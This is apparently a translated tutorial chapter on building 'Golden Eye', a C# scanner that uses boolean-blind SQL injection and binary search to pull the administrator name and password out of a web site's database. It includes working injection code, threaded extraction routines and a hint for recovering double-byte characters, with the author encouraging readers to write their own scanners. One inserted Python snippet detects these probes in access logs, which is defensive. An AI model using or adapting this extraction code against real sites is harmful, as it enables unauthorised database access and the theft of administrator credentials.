Golden Eye-creation of SQL Injection scanner (3)


(Author: mikespook | Release Date: | views: 72)

Keywords: Golden Eye, SQL injection, scanner, C#

"Half-lookup" (binary search) is the search method I used in "Golden Eye" 1.2 and 1.3, and it is already very fast. The number of comparisons is the main metric for judging how good a search algorithm is: we want to find what we need with the fewest comparisons. Below are three formulas that quantify the speed of the three search methods. You do not need to study where the formulas come from; interested readers can consult the Data Structures textbook published by Tsinghua University.

"Sequential search": ASL = (n + 1)/2; for n = 20, ASL = 11

"Index search": ASL = log2(n/s + 1) + s/2; for n = 20, s = 6, ASL = 9

"Half-lookup": ASL = log2(n + 1) - 1; for n = 20, ASL = 4

The results are approximate. n is the total number of elements in the table being searched, s is the number of elements in one index block, and ASL is the average search length, i.e. the average number of comparisons. The smaller the value, the faster the search.

The figures show that "half-lookup" is by far the most efficient, and the advantage grows with n. I calculated that with 65535 elements, "sequential search" needs 32768 comparisons on average, while "half-lookup" needs only 15 on average to complete the search.

So far I have introduced three methods for finding the length of a field. Now let's look at how the field content itself is obtained, again using "half-lookup":

private char getfield(string table, string field, int index, int l, int h)
{
    int nchar = 0;
    int low = l;
    int hig = h;
    int mid;
    // Avoid endless loops: cap the number of searches
    int tmp = h - l;
    while ((low <= hig) && (tmp != 0))
    {
        // Calculate the midpoint value
        mid = (low + hig) / 2;
        // Is the field character smaller than the midpoint value?
        if (this.getpage(strpage + "%20and%201=(select%20id%20from%20" + table + "%20where%20asc(mid(" + field + "," + index.ToString() + ",1))<" + mid.ToString() + ")"))
            // Narrow the scan scope
            hig = mid - 1;
        // Is the field character greater than the midpoint value?
        else if (this.getpage(strpage + "%20and%201=(select%20id%20from%20" + table + "%20where%20asc(mid(" + field + "," + index.ToString() + ",1))>" + mid.ToString() + ")"))
            // Narrow the scan scope
            low = mid + 1;
        // Is the field character equal to the midpoint value?
        else if (this.getpage(strpage + "%20and%201=(select%20id%20from%20" + table + "%20where%20asc(mid(" + field + "," + index.ToString() + ",1))=" + mid.ToString() + ")"))
        {
            // Search successful
            nchar = mid;
            // Exit the loop
            break;
        }
        // One fewer search allowed
        --tmp;
    }
    // Return the result; 0 means the search failed
    return (char)nchar;
}

This function works much like the one that obtains the field length; the comments explain each step.
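Seen from the server side, every character this function recovers costs several requests whose query strings share one shape: "and 1=(select ... where asc(mid(field,i,1)) op N)", plus the "len(field) op N" probes from the length function. The following added example (not part of Golden Eye; log lines, addresses and the threshold are constructed for illustration) decodes access-log requests and flags source addresses that issue repeated probes of that shape, which is what a detection rule for this scanner looks like in practice.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample access-log lines in Apache combined style (not from the article).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /show.asp?id=5%20and%201=(select%20id%20from%20password%20where%20asc(mid(name,1,1))<79) HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /show.asp?id=5%20and%201=(select%20id%20from%20password%20where%20asc(mid(name,1,1))>79) HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /show.asp?id=5%20and%201=(select%20id%20from%20password%20where%20asc(mid(name,1,1))=79) HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:55:39 +0000] "GET /show.asp?id=5%20and%201=(select%20id%20from%20password%20where%20len(name)<10) HTTP/1.1" 200 5120
198.51.100.2 - - [10/Oct/2023:13:55:40 +0000] "GET /show.asp?id=5 HTTP/1.1" 200 5120
198.51.100.2 - - [10/Oct/2023:13:56:01 +0000] "GET /search.asp?q=mid-term HTTP/1.1" 200 2048
"""

# Fields of a combined-format line that we need: source IP, timestamp, method, URL.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)')
# Boolean-blind probe shapes used by the scanner described in the article:
# "and 1=(select ... where asc(mid(field,i,1)) op N)" and the length probe "len(field) op N".
PROBE_RE = re.compile(
    r'\band\s+1\s*=\s*\(\s*select\b.*?\bwhere\b.*?\b(?:asc\s*\(\s*mid\s*\(|len\s*\()',
    re.IGNORECASE | re.DOTALL)

def extract_probe(url):
    """Return the decoded query string if it carries a blind-SQLi probe, else None."""
    if "?" not in url:
        return None
    query = unquote(url.split("?", 1)[1])  # %20 etc. back to plain text before matching
    return query if PROBE_RE.search(query) else None

def scan_log(text, threshold=3):
    """Count probe requests per source IP; return {ip: count} for IPs at or above threshold."""
    counts = defaultdict(int)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if extract_probe(m.group("url")) is not None:
            counts[m.group("ip")] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

A real deployment would count per IP within a sliding time window and alert on the burst rather than the total, since one character of a 94-value range takes about seven such requests in quick succession.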

With functions for obtaining the field length and the characters of the field value, we can write the actual scanning code that calls them. I use multiple threads here. Because a thread entry function cannot receive arguments directly, the following fields must be added to the form class to pass parameters to the scan threads:

private bool bnameover; // false while the thread scanning the Administrator name runs, true when it finishes
private bool bpassover; // false while the thread scanning the password runs, true when it finishes
private string strpage; // address of the target page to scan

The following is the thread function that scans the Administrator name:

public void getname()
{
    int nnamelen;
    txtlog.Text += "Querying the length of the Administrator name...\u000d\u000a";
    // Call getfieldlen to obtain the length of the Administrator name
    nnamelen = this.getfieldlen("password", "name", 1, 20);
    txtlog.Text += "Administrator name length: " + nnamelen.ToString() + "\u000d\u000a";
    // When the Administrator name length is not 0
    if (!nnamelen.Equals(0))
    {
        txtlog.Text += "Querying the Administrator name...\u000d\u000a";
        // Loop once per character of the Administrator name
        for (int j = 1; j <= nnamelen; ++j)
        {
            txtlog.Text += "Querying character " + j.ToString() + " of the Administrator name...\u000d\u000a";
            // Call getfield to obtain the j-th character; the search range is ASCII 33-126
            char ctmp = this.getfield("password", "name", j, 33, 126);
            // If getfield returns 0, the query failed
            if (!ctmp.Equals('\u0000'))
                txtname.Text += ctmp;
            else
            {
                txtlog.Text += "An error occurred while querying the Administrator name!\u000d\u000a";
                break;
            }
        }
        txtlog.Text += "The Administrator name query is complete!\u000d\u000a";
    }
    else
    {
        txtlog.Text += "No usable Administrator name could be found!\u000d\u000a";
    }
    // Check whether the password scan has finished
    if (bpassover)
    {
        // The password scan is also done, so re-enable btnok
        btnok.Enabled = true;
    }
    // Set bnameover to indicate that the Administrator name scan has finished
    bnameover = true;
}

The thread function that scans the password has the same structure:

public void getpass()
{
    int npasslen;
    txtlog.Text += "Querying the password length...\u000d\u000a";
    // Call getfieldlen to obtain the password length (field PWD, the same field getfield reads below)
    npasslen = this.getfieldlen("password", "PWD", 1, 50);
    txtlog.Text += "Password length: " + npasslen.ToString() + "\u000d\u000a";
    // When the password length is not 0
    if (!npasslen.Equals(0))
    {
        txtlog.Text += "Querying the password...\u000d\u000a";
        // Loop once per character of the password
        for (int j = 1; j <= npasslen; ++j)
        {
            txtlog.Text += "Querying character " + j.ToString() + " of the password...\u000d\u000a";
            // Call getfield to obtain the j-th character; the search range is ASCII 33-126
            char ctmp = this.getfield("password", "PWD", j, 33, 126);
            // If getfield returns 0, the query failed
            if (!ctmp.Equals('\u0000'))
                txtpass.Text += ctmp;
            else
            {
                txtlog.Text += "An error occurred while querying the password!\u000d\u000a";
                break;
            }
        }
        txtlog.Text += "The password query is complete!\u000d\u000a";
    }
    else
    {
        txtlog.Text += "No usable password could be found!\u000d\u000a";
    }
    // Check whether the Administrator name scan has finished
    if (bnameover)
    {
        // The name scan is also done, so re-enable btnok.
        // Note: this check and the flag assignment below are not atomic; if both
        // threads finish at the same moment, the button can stay disabled.
        btnok.Enabled = true;
    }
    // Set bpassover to indicate that the password scan has finished
    bpassover = true;
}

Now everything is in place; we only need to create the threads and start scanning. Add the following code to the Click event of the button btnok:

// Requires: using System.Threading;
private void btnok_Click(object sender, System.EventArgs e)
{
    // Clear the scan log, Administrator name and password text boxes
    txtlog.Clear();
    txtname.Clear();
    txtpass.Clear();
    // Pass the address of the target page to the field strpage used by the threads
    strpage = txtpage.Text;
    // Disable the button to prevent output conflicts from repeated clicks
    btnok.Enabled = false;
    // Create the threads
    ThreadStart tsname = new ThreadStart(getname);
    Thread tname = new Thread(tsname);
    ThreadStart tspass = new ThreadStart(getpass);
    Thread tpass = new Thread(tspass);
    // Reset the scan-finished flags
    bnameover = false;
    bpassover = false;
    // Start the threads and begin scanning
    tname.Start();
    tpass.Start();
}

That is all of the core code of "Golden Eye".

In addition, this program cannot recover field values that contain Chinese characters. How could Chinese content be found? A hint: Chinese characters are double-byte, and midb and ascb are the byte-oriented versions of mid and asc. For example, with the two-character Chinese word for "hacker", ascb(midb("hacker", 3, 1)) returns 162, the code of the first byte of the second character, and ascb(midb("hacker", 4, 1)) returns 91, the code of its second byte. There is also the byte-oriented length function lenb: len of the two-character word "hacker" is 2, whereas lenb of the same string is 4. With these functions the problem becomes much simpler; of course the scan range is then no longer 33-126 but 0-255.

Do you now have a general picture of how a program can simulate this tedious guessing? I hope you can see how, across the successive versions, I used different search methods to speed up the search; that is the purpose of this article. I hope everyone can understand the idea of simulating an intrusion with a program and write their own scanners.

Finally, I want to mention that I do not release software and then abandon it. Patches for the scanner and for the "jinmei" system can be downloaded from my site. If you use the "jinmei" system, you had better patch it! If you have any questions about the article, you can also leave a message on the message board: http://www.xxiyy.com. Have a good time! (^_^)
